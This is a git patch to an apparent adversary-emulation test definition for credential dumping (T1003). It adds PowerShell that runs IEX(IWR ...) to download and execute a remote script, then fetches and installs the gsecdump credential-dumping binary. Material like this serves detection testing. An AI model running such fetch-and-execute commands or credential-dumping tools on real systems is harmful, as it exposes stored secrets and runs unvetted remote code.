From 291346e52b8bb4c85ea568b7c459ca0f486bece8 Mon Sep 17 00:00:00 2001 From: Mr B0b <6248411+Mr-B0b@users.noreply.github.com> Date: Sat, 7 Mar 2020 23:20:14 +0100 Subject: [PATCH] Add test 2 prereqs for T1003 that performs Credential Dumping (#861) * Add test 2 prereqs for T1003 that performs Credential Dumping * add import from web Co-authored-by: Carrie Roberts --- atomics/T1003/T1003.yaml | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index c21dca84..2be1d1bd 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -30,15 +30,27 @@ atomic_tests: description: Path to the Gsecdump executable type: Path default: PathToAtomicsFolder\T1003\bin\gsecdump.exe + gsecdump_url: + description: Path to download Gsecdump binary file + type: url + default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe + gsecdump_bin_hash: + description: File hash of the Gsecdump binary file + type: String + default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC dependency_executor_name: powershell dependencies: - description: | - Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe}) + Gsecdump must exist on disk at specified location (#{gsecdump_exe}) prereq_command: | if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} get_prereq_command: | - Write-Host Automated installer not implemented yet + $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" + IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") + if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){ + Move-Item $binpath "#{gsecdump_exe}" + } executor: name: command_prompt